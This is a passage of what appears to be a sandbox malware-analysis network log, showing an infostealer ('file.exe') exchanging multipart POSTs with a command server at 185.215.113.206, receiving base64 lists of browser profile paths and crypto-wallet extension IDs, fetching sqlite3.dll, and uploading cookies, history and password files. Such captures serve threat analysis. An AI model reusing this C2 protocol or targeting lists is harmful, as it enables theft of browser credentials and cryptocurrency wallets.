name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="message"browsers------EGDGIIJJECFIDHJJKKFC--
Dec 8, 2024 19:52:04.418545961 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 8, 2024 19:52:04.418649912 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Dec 8, 2024 19:52:04.430576086 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDH Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="message"plugins------DBKFHCFBGIIJKFHJDHDH--
Dec 8, 2024 19:52:04.872602940 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:04 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 8, 2024 19:52:04.872641087 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Dec 8, 2024 19:52:04.872652054 CET	248	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Dec 8, 2024 19:52:04.872720957 CET	1236	IN	Data Raw: 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d 4e 74 62 6d 74 69 5a 32 35 38 4d 58 77 77 66 44 42 38 56 47 56 36 51 6d Data Ascii: YW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZ
Dec 8, 2024 19:52:04.872736931 CET	1236	IN	Data Raw: 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 46 73 62 47 56 30 66 47 46 70 61 6d 4e 69 5a 57 52 76 61 57 70 74 5a 32 Data Ascii: bmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGh
Dec 8, 2024 19:52:04.872819901 CET	1236	IN	Data Raw: 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 4a 73 61 33 Data Ascii: Y2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWl
Dec 8, 2024 19:52:04.872869968 CET	916	IN	Data Raw: 62 57 70 74 61 32 4e 68 5a 6d 4e 6f 63 48 42 69 62 6e 42 75 61 47 52 74 62 32 35 38 4d 58 77 77 66 44 42 38 52 57 78 73 61 53 41 74 49 46 4e 31 61 53 42 58 59 57 78 73 5a 58 52 38 62 32 4e 71 5a 48 42 74 62 32 46 73 62 47 31 6e 62 57 70 69 59 6d Data Ascii: bWpta2NhZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWp
Dec 8, 2024 19:52:04.881257057 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEH Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="message"fplugins------HIDAKFIJJKJJJKEBKJEH--
Dec 8, 2024 19:52:05.321135044 CET	335	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:05 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 8, 2024 19:52:05.338324070 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCG Host: 185.215.113.206 Content-Length: 8279 Connection: Keep-Alive Cache-Control: no-cache
Dec 8, 2024 19:52:05.338376999 CET	8279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 Data Ascii: ------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 8, 2024 19:52:06.429753065 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:52:06.702727079 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 19:52:07.142388105 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:06 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Dec 8, 2024 19:52:07.142412901 CET	224	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Dec 8, 2024 19:52:07.144311905 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49748	185.215.113.206	80	7396	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:52:16.342463017 CET	621	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKF Host: 185.215.113.206 Content-Length: 419 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 [TRUNCATED] Data Ascii: ------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------JEGDGIIJJECFIDHJJKKF--
Dec 8, 2024 19:52:18.180409908 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:52:18.819797993 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC Host: 185.215.113.206 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Dec 8, 2024 19:52:18.819844007 CET	1451	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="file_name"aGlzdG9yeVxHb
Dec 8, 2024 19:52:19.874952078 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:52:19.910602093 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEHJKJEBGHJJKEBGIEC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 33 38 35 35 39 63 33 35 36 63 66 30 32 32 39 33 65 61 61 62 34 30 38 66 35 30 31 36 63 35 32 62 32 30 36 33 35 63 38 35 66 39 32 66 32 64 35 63 33 30 37 33 37 66 62 62 37 36 62 65 32 32 33 66 65 63 37 38 36 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="token"cb38559c356cf02293eaab408f5016c52b20635c85f92f2d5c30737fbb76be223fec786e------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="file"------KJEHJKJEBGHJJKEBGIEC--
